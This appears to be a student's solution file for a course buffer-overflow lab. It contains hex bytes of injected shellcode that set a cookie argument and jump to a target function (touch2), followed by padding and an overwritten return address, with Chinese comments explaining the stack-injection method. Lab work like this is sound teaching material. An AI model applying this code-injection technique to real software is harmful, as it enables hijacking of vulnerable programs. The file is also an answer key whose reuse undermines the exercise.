48 c7 c7 08     # 这是栈顶(0x5565fce8)
4a 2e 2a 68 
52 20 40 00 
c3 00 00 00 
00 00 00 00 
00 00 00 00 
00 00 00 00 
00 00 00 00 
00 00 00 00 
00 00 00 00
00 00 00 00 
00 00 00 00 
00 00 00 00 
00 00 00 00 
e8 fc 65 55 
# When you want to run this code again, you 'd better delete this comment.
# 首先在调用getbuf函数时，栈上会被分配$0x38个字节（也就是56个字节）的位置，需要在第57到60个字节覆盖掉原来的位置才可以注入攻击;
# 可以把攻击代码(exploit code)注入到栈上（其他地方我也不知道怎么注入），把覆盖之后的返回地址设为原来的栈顶指针。这样就可以把程序引导到注入的攻击代码的部分进行攻击;(书197页有)
# 攻击代码就是把函数的第一个参数变成相应的cookie，把调用的函数地址换成touch2的地址。执行完这两步之后直接ret即可.